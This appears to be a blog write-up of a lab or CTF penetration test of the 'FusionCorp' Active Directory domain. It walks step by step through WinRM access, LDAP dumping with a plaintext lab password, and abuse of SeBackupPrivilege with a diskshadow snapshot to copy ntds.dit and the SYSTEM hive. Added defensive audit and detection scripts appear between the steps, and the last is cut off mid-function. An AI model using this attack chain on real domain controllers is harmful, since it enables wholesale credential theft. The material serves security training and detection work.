Article summary: This post gives a detailed account of an internal penetration test against the FusionCorp domain environment: an nmap scan identifies the domain controller Fusion-DC.fusion.corp, .NET reflection is used to enable the SeBackupPrivilege privilege, and the VSS volume shadow copy service is used to get around the exclusive file lock, yielding the domain controller's ntds.dit database. The document includes the full port-scan results, directory enumeration and the concrete operational steps, showing the complete attack chain from information gathering to privilege escalation. Overall score: 85. Categories: internal penetration testing, red team, hands-on experience, security tools, vulnerability analysis
Lateral movement in the domain
*Evil-WinRM* PS C:\Users\lparker\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
============== =============================================
fusion\lparker S-1-5-21-1898838421-3672757654-990739655-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Medium Plus Mandatory Level (medium-plus integrity level), and a member of Remote Management Users. No local administrator rights.
The network dropped again; evidently not my problem. From here on, don't worry about which IP it is, as long as it's the domain controller.
*Evil-WinRM* PS C:\Users\lparker\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest jmurphy
krbtgt lparker
The command completed with one or more errors.
Trying Kerberoasting. Why bother trying Kerberoasting at this point?
The account in hand is usually just an ordinary domain user with almost no privileges in the domain.
- Service accounts are special: many services (e.g. MSSQL, IIS, Exchange) have an SPN (Service Principal Name) configured and run under a domain admin or other high-privilege account.
- Goal: with Kerberoasting you obtain service tickets for these service accounts, encrypted with the account's password hash. If the hash is cracked offline, you can log in directly as these high-privilege accounts, jumping from ordinary user straight to administrator.
Type "WHOAMI /?" for usage.
*Evil-WinRM* PS C:\Users\lparker\Documents> setspn -T fusion.corp -Q */*
Checking domain DC=fusion,DC=corp
CN=FUSION-DC,OU=Domain Controllers,DC=fusion,DC=corp
TERMSRV/FUSION-DC
TERMSRV/Fusion-DC.fusion.corp
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/Fusion-DC.fusion.corp
ldap/Fusion-DC.fusion.corp/ForestDnsZones.fusion.corp
ldap/Fusion-DC.fusion.corp/DomainDnsZones.fusion.corp
DNS/Fusion-DC.fusion.corp
GC/Fusion-DC.fusion.corp/fusion.corp
RestrictedKrbHost/Fusion-DC.fusion.corp
RestrictedKrbHost/FUSION-DC
RPC/46637f26-9c61-4af6-b7a1-dd7055230d29._msdcs.fusion.corp
HOST/FUSION-DC/FUSION
HOST/Fusion-DC.fusion.corp/FUSION
HOST/FUSION-DC
HOST/Fusion-DC.fusion.corp
HOST/Fusion-DC.fusion.corp/fusion.corp
E3514235-4B06-11D1-AB04-00C04FC2DCD2/46637f26-9c61-4af6-b7a1-dd7055230d29/fusion.corp
ldap/FUSION-DC/FUSION
ldap/46637f26-9c61-4af6-b7a1-dd7055230d29._msdcs.fusion.corp
ldap/Fusion-DC.fusion.corp/FUSION
ldap/FUSION-DC
ldap/Fusion-DC.fusion.corp
ldap/Fusion-DC.fusion.corp/fusion.corp
CN=krbtgt,CN=Users,DC=fusion,DC=corp
kadmin/changepw
Existing SPN found!
*Evil-WinRM* PS C:\Users\lparker\Documents>
Well, no user accounts are configured with an SPN that Kerberoasting could target.
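As an added defensive check (not part of the original post), the script below parses the same `setspn -Q */*` listing and reports which SPN holders are user accounts rather than machine accounts; those are the accounts a Kerberoast request would target, so they are the ones whose passwords must be long and random or, better, managed (gMSA). The input is the listing captured above plus one constructed account, svc_sql with an MSSQLSvc SPN, which does not exist in the post and only exercises the flagging path. The machine-account heuristic (presence of a HOST/ SPN) is an assumption of this example, not something the post states.

```python
"""Audit `setspn -T <domain> -Q */*` output for user accounts that carry SPNs.

Added example, not code from the original post. SETSPN_OUTPUT is the listing
the post captured, plus one constructed entry (svc_sql) that is not in the post.
"""
from __future__ import annotations

from dataclasses import dataclass, field

SETSPN_OUTPUT = """\
Checking domain DC=fusion,DC=corp
CN=FUSION-DC,OU=Domain Controllers,DC=fusion,DC=corp
        TERMSRV/FUSION-DC
        TERMSRV/Fusion-DC.fusion.corp
        Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/Fusion-DC.fusion.corp
        ldap/Fusion-DC.fusion.corp/ForestDnsZones.fusion.corp
        ldap/Fusion-DC.fusion.corp/DomainDnsZones.fusion.corp
        DNS/Fusion-DC.fusion.corp
        GC/Fusion-DC.fusion.corp/fusion.corp
        RestrictedKrbHost/Fusion-DC.fusion.corp
        RestrictedKrbHost/FUSION-DC
        RPC/46637f26-9c61-4af6-b7a1-dd7055230d29._msdcs.fusion.corp
        HOST/FUSION-DC/FUSION
        HOST/Fusion-DC.fusion.corp/FUSION
        HOST/FUSION-DC
        HOST/Fusion-DC.fusion.corp
        HOST/Fusion-DC.fusion.corp/fusion.corp
        E3514235-4B06-11D1-AB04-00C04FC2DCD2/46637f26-9c61-4af6-b7a1-dd7055230d29/fusion.corp
        ldap/FUSION-DC/FUSION
        ldap/46637f26-9c61-4af6-b7a1-dd7055230d29._msdcs.fusion.corp
        ldap/Fusion-DC.fusion.corp/FUSION
        ldap/FUSION-DC
        ldap/Fusion-DC.fusion.corp
        ldap/Fusion-DC.fusion.corp/fusion.corp
CN=krbtgt,CN=Users,DC=fusion,DC=corp
        kadmin/changepw
CN=svc_sql,CN=Users,DC=fusion,DC=corp
        MSSQLSvc/sql01.fusion.corp:1433
Existing SPN found!
"""


@dataclass
class SpnHolder:
    """One directory object and the SPNs registered on it."""
    dn: str
    spns: list[str] = field(default_factory=list)

    @property
    def cn(self) -> str:
        # First RDN of the DN, e.g. "CN=krbtgt,CN=Users,..." -> "krbtgt"
        return self.dn.split(",", 1)[0].split("=", 1)[1]

    @property
    def is_machine_account(self) -> bool:
        # Heuristic (assumption): computer objects register HOST/ SPNs when
        # they join the domain, user objects normally do not. Machine-account
        # passwords are long and random, so their tickets are not a practical
        # offline-cracking target.
        return any(s.upper().startswith("HOST/") for s in self.spns)


def parse_setspn(text: str) -> list[SpnHolder]:
    """Group the SPN lines under the DN line that precedes them."""
    holders: list[SpnHolder] = []
    current: SpnHolder | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("CN="):
            current = SpnHolder(dn=line)
            holders.append(current)
        elif current is not None and "/" in line:
            current.spns.append(line)
    return holders


def kerberoastable(holders: list[SpnHolder]) -> list[SpnHolder]:
    """User objects with SPNs: the accounts a Kerberoast request asks tickets for.

    krbtgt is excluded: its only SPN (kadmin/changepw) is not a service a TGS
    is normally issued for, and the account is disabled by design.
    """
    return [h for h in holders
            if not h.is_machine_account and h.cn.lower() != "krbtgt"]


if __name__ == "__main__":
    for holder in kerberoastable(parse_setspn(SETSPN_OUTPUT)):
        print(f"user account with SPN(s): {holder.dn}")
        for spn in holder.spns:
            print(f"    {spn}")
```

Run against the listing exactly as captured (without the constructed svc_sql entry) the audit reports nothing, which matches the conclusion above; each account it does report should be reviewed for password length, rotation, and whether it can be migrated to a group-managed service account.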
apple@macos ldapdomaindump % ldapdomaindump -u 'fusion.corp\lparker' -p '!!abbylvzsvs2k6!' --no-json --no-grep 10.145.150.244
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
apple@macos ldapdomaindump % ls
LICENSE domain_computers_by_os.html domain_users_by_group.html pyproject.toml
MANIFEST.in domain_groups.html help.txt requirements.txt
README.md domain_policy.html ldapdomaindump setup.py
build domain_trusts.html ldapdomaindump.egg-info
domain_computers.html domain_users.html ldapdomaindump.py
apple@macos ldapdomaindump % open .
apple@macos ldapdomaindump %
Viewing the LDAP domain dump
Opening domain_users.html reveals jmurphy's password; note at the same time
Remote Management Users
Members of this group can access the computer over the Windows Remote Management (WinRM) protocol.
Backup Operators
- SeBackupPrivilege (backup privilege): lets the user read any file on the file system, completely ignoring NTFS permissions (even a file restricted to "Administrator only" can be read by a backup operator).
- **SeRestorePrivilege** (restore privilege): lets the user write any file anywhere on the system, likewise ignoring permissions.
*Evil-WinRM* PS C:\Users\jmurphy\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
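An added audit script (not from the original post) that reads `whoami /all` output and reports the privileges and group memberships that bypass the NTFS ACL model. The PRIVILEGES table is the one shown above for jmurphy; the USER and GROUP sections are constructed to reflect the membership the LDAP dump revealed (Backup Operators, Remote Management Users), and jmurphy's SID is made up. It also encodes a caveat worth having in an audit: a privilege reported as Disabled is still held by the token and can be enabled by its owner at any time, so the audit treats Disabled and Enabled alike.

```python
"""Audit `whoami /all` output for privileges and groups that defeat NTFS ACLs.

Added example, not code from the original post. WHOAMI_ALL mixes the
privilege table the post shows for jmurphy with constructed USER and GROUP
sections (the user SID is made up; group SIDs are the well-known ones).
"""
from __future__ import annotations

import re

WHOAMI_ALL = """\
USER INFORMATION
----------------

User Name      SID
============== =============================================
fusion\\jmurphy S-1-5-21-1898838421-3672757654-990739655-1104


GROUP INFORMATION
-----------------

Group Name                      Type             SID          Attributes
=============================== ================ ============ ==================================================
Everyone                        Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\\Backup Operators        Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Remote Management Users Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users                   Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
Mandatory Label\\Medium Plus Mandatory Level Label S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

# Privileges that let the holder bypass or rewrite object ACLs.
ACL_BYPASS_PRIVILEGES = {
    "SeBackupPrivilege": "read any file regardless of its ACL (SAM, SYSTEM hive, ntds.dit)",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any object and then rewrite its ACL",
    "SeDebugPrivilege": "open any process, including lsass.exe",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# Well-known SIDs of built-in groups whose membership grants such privileges.
SENSITIVE_GROUP_SIDS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-549": "Server Operators",
    "S-1-5-32-551": "Backup Operators",
}
REMOTE_MANAGEMENT_USERS_SID = "S-1-5-32-580"

_USER_RE = re.compile(r"^(?P<user>\S+\\\S+)\s+(?P<sid>S-1-5-21-[\d-]+)$")
_GROUP_RE = re.compile(
    r"^(?P<name>.+?)\s+(?P<type>Well-known group|Alias|Group|Label)\s+(?P<sid>S-1-[\d-]+)")
_PRIV_RE = re.compile(r"^(?P<name>Se\w+Privilege)\s+.*\s(?P<state>Enabled|Disabled)$")


def parse_whoami_all(text: str) -> dict:
    """Pull user, groups (by SID) and privileges (with state) out of the tables."""
    user, groups, privileges = "", {}, {}
    for line in text.splitlines():
        line = line.rstrip()
        m = _USER_RE.match(line)
        if m and not user:
            user = m.group("user")
            continue
        m = _GROUP_RE.match(line)
        if m:
            groups[m.group("sid")] = m.group("name")
            continue
        m = _PRIV_RE.match(line)
        if m:
            privileges[m.group("name")] = m.group("state")
    return {"user": user, "groups": groups, "privileges": privileges}


def audit(text: str) -> dict:
    info = parse_whoami_all(text)
    findings: list[str] = []
    for name, state in info["privileges"].items():
        if name in ACL_BYPASS_PRIVILEGES:
            # "Disabled" only means not enabled in this token right now; the
            # holder can switch it on with AdjustTokenPrivileges at will, so
            # the state does not reduce the risk.
            findings.append(f"{name} ({state}): can {ACL_BYPASS_PRIVILEGES[name]}")
    for sid, label in SENSITIVE_GROUP_SIDS.items():
        if sid in info["groups"]:
            findings.append(f"member of {label} ({sid})")
    if REMOTE_MANAGEMENT_USERS_SID in info["groups"] and "SeBackupPrivilege" in info["privileges"]:
        # Remote reach plus ACL bypass: credential material on the host is
        # exposed to anyone holding this account's password, with no local
        # admin rights needed. Note SeBackupPrivilege bypasses ACLs only, not
        # sharing locks, so files held open by lsass.exe additionally need a
        # snapshot; hardening must therefore also cover VSS/diskshadow access.
        findings.append("Remote Management Users + SeBackupPrivilege: host secrets reachable over WinRM alone")
    return {**info, "findings": findings, "severity": "high" if findings else "info"}


if __name__ == "__main__":
    result = audit(WHOAMI_ALL)
    print(f"{result['user']}: severity={result['severity']}")
    for finding in result["findings"]:
        print(f"  - {finding}")
```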
~~Time to pop the champagne 🍾 (just kidding)~~
Taking the domain controller
1. Using Volume Shadow Copy (VSS) (failed)
*Evil-WinRM* PS C:\Users\jmurphy\Documents> ntdsutil "ac i ntds" "ifm" "create full c:\temp\ntds_bak" q q
C:\Windows\system32\ntdsutil.exe: ac i ntds
Active instance set to "ntds".
C:\Windows\system32\ntdsutil.exe: ifm
ifm: create full c:\temp\ntds_bak
Creating snapshot...
error 0x5(Access is denied.)
IFM media created successfully in c:\temp\ntds_bak
ifm: q
C:\Windows\system32\ntdsutil.exe: q
*Evil-WinRM* PS C:\Users\jmurphy\Documents>
2. Using Robocopy backup mode (failed)
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> robocopy /B C:\Windows\NTDS\ C:\Users\jmurphy\Desktop\ ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Sunday, May 10, 2026 9:01:15 AM
Source : C:\Windows\NTDS\
Dest : C:\Users\jmurphy\Desktop\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 C:\Windows\NTDS\
New File 16.0 m ntds.dit
2026/05/10 09:01:15 ERROR 0 (0x00000000) Copying File C:\Windows\NTDS\ntds.dit
The operation completed successfully.
3. Don't panic, SeBackupPrivilege to the rescue
SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll
A legitimate Windows "backdoor": forcibly read (or write) any file, completely ignoring NTFS permissions.
Download link:
https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug
# Create a folder to hold the files
mkdir SeBackupPrivilege && cd SeBackupPrivilege
# Download the DLLs with curl (the URLs may change between versions; check them in a browser if in doubt)
curl -L -O https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll
curl -L -O https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll
# Upload the files from the Evil-WinRM shell
upload /your/local/path/SeBackupPrivilegeCmdLets.dll
upload /your/local/path/SeBackupPrivilegeUtils.dll
# Run
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
# 1. Export the SYSTEM registry hive (needed for the decryption key):
reg save hklm\system C:\Users\jmurphy\Desktop\system.save
# 2. Force-copy NTDS.DIT (using the backup privilege):
Copy-FileSeBackupPrivilege C:\Windows\NTDS\ntds.dit C:\Users\jmurphy\Desktop\ntds.dit -Overwrite
Error:
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> reg save hklm\system C:\Users\jmurphy\Desktop\system.save
The operation completed successfully.
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> Copy-FileSeBackupPrivilege C:\Windows\NTDS\ntds.dit C:\Users\jmurphy\Desktop\ntds.dit -Overwrite
Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT: 0x80070020)
At line:1 char:1
+ Copy-FileSeBackupPrivilege C:\Windows\NTDS\ntds.dit C:\Users\jmurphy\ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
Hitting 0x80070020 (The process cannot access the file because it is being used by another process) is the classic case. On a domain controller (DC) the ntds.dit database is held open exclusively by lsass.exe; even with SeBackupPrivilege (backup privilege) you only bypass the ACL (access control list), not the file-system sharing lock.
# Enable the privilege (this step is critical; otherwise the subsequent copy will still fail with a permission error)
[bz.OneOEight.SeBackupPrivilege.Utils]::SetTokenPrivilege("SeBackupPrivilege")
Error:
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> [bz.OneOEight.SeBackupPrivilege.Utils]::SetTokenPrivilege("SeBackupPrivilege")
Unable to find type [bz.OneOEight.SeBackupPrivilege.Utils].
At line:1 char:1
+ [bz.OneOEight.SeBackupPrivilege.Utils]::SetTokenPrivilege("SeBackupPr ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (bz.OneOEight.SeBackupPrivilege.Utils:TypeName) [], RuntimeException
+ FullyQualifiedErrorId : TypeNotFound
Force-load the DLL via reflection, then check whether the type has been loaded, i.e. whether it already exists in the current session:
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> [Reflection.Assembly]::LoadFile("C:\Users\jmurphy\Desktop\SeBackupPrivilegeUtils.dll")
GAC Version Location
--- ------- --------
False v2.0.50727 C:\Users\jmurphy\Desktop\SeBackupPrivilegeUtils.dll
Call the class name directly:
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> [AppDomain]::CurrentDomain.GetAssemblies() | ForEach-Object { $_.GetTypes() } | Where-Object { $_.FullName -like "*SeBackupPrivilege*" }
IsPublic IsSerial Name BaseType
-------- -------- ---- --------
True False SeBackupPrivilegeUtils System.Object
False True EFileAccess System.Enum
False True EFileShare System.Enum
False True ECreationDisposition System.Enum
False True EFileAttributes System.Enum
False True TOKEN_INFORMATION_CLASS System.Enum
False False TOKEN_PRIVILEGES System.ValueType
False False LUID_AND_ATTRIBUTES System.ValueType
False False LUID System.ValueType
False False TokPriv1Luid System.ValueType
True False FileUtils System.Object
True False Get_SeBackupPrivilege System.Management.Automation.Cmdlet
True False Set_SeBackupPrivige System.Management.Automation.Cmdlet
True False Copy_FileSeBackupPrivilege System.Management.Automation.PSCmdlet
That doesn't work. Call it directly from the types that were just loaded:
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> $type = [AppDomain]::CurrentDomain.GetAssemblies() | ForEach-Object { $_.GetTypes() } | Where-Object { $_.Name -eq "SeBackupPrivilegeUtils" }
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> $type::SetTokenPrivilege("SeBackupPrivilege")
Method invocation failed because [bz.OneOEight.SeBackupPrivilege.SeBackupPrivilegeUtils] does not contain a method named 'SetTokenPrivilege'.
At line:1 char:1
+ $type::SetTokenPrivilege("SeBackupPrivilege")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodNotFound
Still no luck. Probe for the correct method name and see which static methods this class actually exposes:
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> $type.GetMethods() | Where-Object { $_.Name -eq "setSeBackupPrivilege" } | ForEach-Object { $_.ToString() }
Boolean setSeBackupPrivilege(Boolean)
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> [bz.OneOEight.SeBackupPrivilege.SeBackupPrivilegeUtils]::setSeBackupPrivilege($true)
True
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> whoami /priv | findstr "SeBackupPrivilege"
SeBackupPrivilege Back up files and directories Enabled
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
The method name is **setSeBackupPrivilege**
State already shows Enabled, which is the same as before, but "privilege enabled" does not mean "lock released".
Next, keep trying to create a volume shadow snapshot to pull down ntds.dit
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> $s1 = [WmiClass]"Win32_ShadowCopy"
Cannot convert value "Win32_ShadowCopy" to type "System.Management.ManagementClass". Error: "Access denied "
At line:1 char:1
+ $s1 = [WmiClass]"Win32_ShadowCopy"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvalidCastToWMIClass
This means that although SeBackupPrivilege is enabled, the WinRM session's WMI permissions are restricted. On a domain controller, even as an administrator, manipulating shadow copies directly over WMI is sometimes filtered (especially by UAC remote restrictions).
Since WMI is blocked, switch to a lower-level approach that bypasses the WMI layer. With SeBackupPrivilege now in the Enabled state, we can try **diskshadow**'s script mode, or **vssadmin** (although it is usually used for listing, it can create snapshots under some configurations).
Write the commands to a script file:
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> "set context persistent nowriters", "add volume c: alias temp_shadow", "create", "expose %temp_shadow% z:", "exit" | Out-File -FilePath script.txt -Encoding ascii
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: FUSION-DC, 5/10/2026 10:09:34 AM
-> set context persistent nowriters
-> add volume c: alias temp_shadow
-> create
The .cab metadata file cannot be stored in the current working directory, because it is read-only.
Use SET METADATA <metadata.cab> to specify an existing, writable directory.
*Evil-WinRM* PS C:\Users\jmurphy\Desktop>
This error occurs because, when creating a snapshot, diskshadow by default tries to write a metadata file (.cab) in the current directory; inside the interactive Evil-WinRM session, some directories that appear writable may still be write-restricted from the point of view of the diskshadow service process.
No matter: manually specify a path that is guaranteed to be writable (for example C:\Windows\Temp) for the metadata.
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> "set context persistent nowriters", "set metadata C:\Windows\Temp\metadata.cab", "add volume c: alias temp_shadow", "create", "expose %temp_shadow% z:", "exit" | Out-File -FilePath script.txt -Encoding ascii
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: FUSION-DC, 5/10/2026 10:12:35 AM
-> set context persistent nowriters
-> set metadata C:\Windows\Temp\metadata.cab
-> add volume c: alias temp_shadow
-> create
Alias temp_shadow for shadow ID {f0111d20-3ae6-43bd-bd30-27f323d05c58} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {517547cb-67e1-45ca-99fa-51e11edad180} set as environment variable.
Querying all shadow copies with the shadow copy set ID {517547cb-67e1-45ca-99fa-51e11edad180}
* Shadow copy ID = {f0111d20-3ae6-43bd-bd30-27f323d05c58} %temp_shadow%
- Shadow copy set: {517547cb-67e1-45ca-99fa-51e11edad180} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{66a659a9-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 5/10/2026 10:12:36 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: Fusion-DC.fusion.corp
- Service machine: Fusion-DC.fusion.corp
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %temp_shadow% z:
-> %temp_shadow% = {f0111d20-3ae6-43bd-bd30-27f323d05c58}
The shadow copy was successfully exposed as z:\.
-> exit
The snapshot has been exposed as **z:\**. The ntds.dit on the z: drive is now a completely static copy, to which lsass.exe's file lock does not apply.
Use the tool with SeBackupPrivilege enabled earlier to copy it; this time the source path is on z:.
Perform the privileged copy
Copy-FileSeBackupPrivilege z:\Windows\NTDS\ntds.dit C:\Users\jmurphy\Desktop\ntds.dit -Overwrite
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> dir
Directory: C:\Users\jmurphy\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2021 6:04 AM 37 flag.txt
-a---- 5/10/2026 10:15 AM 16777216 ntds.dit
-a---- 5/10/2026 10:10 AM 149 script.txt
-a---- 5/10/2026 9:43 AM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 5/10/2026 9:44 AM 16384 SeBackupPrivilegeUtils.dll
-a---- 5/10/2026 9:44 AM 18075648 system.save
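For the defender, the sequence above leaves a recognisable trail. The following detection script is an added example (not from the original post); it runs a few rules over constructed event records whose field names follow Windows Security events 4688 (process creation, which only carries CommandLine when command-line auditing is enabled) and 4672 (special privileges assigned to a new logon). The command lines are those from the session above; the records themselves are hand-made, not real log exports, and the allow-list of accounts expected to hold backup privileges is an assumption.

```python
"""Detection rules for the ntds.dit extraction chain walked through in the post.

Added example, not code from the original post. SAMPLE_EVENTS are constructed
dictionaries shaped like Security events 4688 and 4672; the command lines are
the ones the post ran, the records and the allow-list are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Accounts expected to receive backup/restore privileges at logon (assumption;
# in practice derive this from the DC's real Backup Operators membership and
# the identities used by scheduled backups).
EXPECTED_BACKUP_PRIVILEGE_HOLDERS = {"fusion\\administrator"}

SAMPLE_EVENTS = [
    {"EventID": 4672, "SubjectDomainName": "FUSION", "SubjectUserName": "Administrator",
     "PrivilegeList": "SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege"},
    {"EventID": 4672, "SubjectDomainName": "FUSION", "SubjectUserName": "jmurphy",
     "PrivilegeList": "SeMachineAccountPrivilege SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege"},
    {"EventID": 4688, "SubjectDomainName": "FUSION", "SubjectUserName": "jmurphy",
     "NewProcessName": r"C:\Windows\System32\ntdsutil.exe",
     "ParentProcessName": r"C:\Windows\System32\wsmprovhost.exe",
     "CommandLine": r'ntdsutil "ac i ntds" "ifm" "create full c:\temp\ntds_bak" q q'},
    {"EventID": 4688, "SubjectDomainName": "FUSION", "SubjectUserName": "jmurphy",
     "NewProcessName": r"C:\Windows\System32\Robocopy.exe",
     "ParentProcessName": r"C:\Windows\System32\wsmprovhost.exe",
     "CommandLine": r"robocopy /B C:\Windows\NTDS\ C:\Users\jmurphy\Desktop\ ntds.dit"},
    {"EventID": 4688, "SubjectDomainName": "FUSION", "SubjectUserName": "jmurphy",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "ParentProcessName": r"C:\Windows\System32\wsmprovhost.exe",
     "CommandLine": r"reg save hklm\system C:\Users\jmurphy\Desktop\system.save"},
    {"EventID": 4688, "SubjectDomainName": "FUSION", "SubjectUserName": "jmurphy",
     "NewProcessName": r"C:\Windows\System32\diskshadow.exe",
     "ParentProcessName": r"C:\Windows\System32\wsmprovhost.exe",
     "CommandLine": r"diskshadow /s script.txt"},
    {"EventID": 4688, "SubjectDomainName": "FUSION", "SubjectUserName": "FUSION-DC$",
     "NewProcessName": r"C:\Windows\System32\svchost.exe",
     "ParentProcessName": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

# (rule name, image basename, regex applied to the normalised command line)
PROCESS_RULES = [
    ("ntdsutil_ifm_export", "ntdsutil.exe", r"\bifm\b.*\bcreate\b"),
    ("robocopy_backup_mode_ntds", "robocopy.exe", r"(^|\s)/b\b.*\\ntds\\"),
    ("reg_save_sensitive_hive", "reg.exe", r"\bsave\b.*hklm\\(system|sam|security)\b"),
    ("diskshadow_script_mode", "diskshadow.exe", r"(^|\s)/s\b"),
    ("vssadmin_create_shadow", "vssadmin.exe", r"\bcreate\s+shadow\b"),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    account: str
    evidence: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _norm(cmd: str) -> str:
    # Collapse whitespace and lower-case so the regexes stay simple.
    return re.sub(r"\s+", " ", cmd).strip().lower()


def detect(events: list[dict]) -> list[Finding]:
    findings: list[Finding] = []
    for ev in events:
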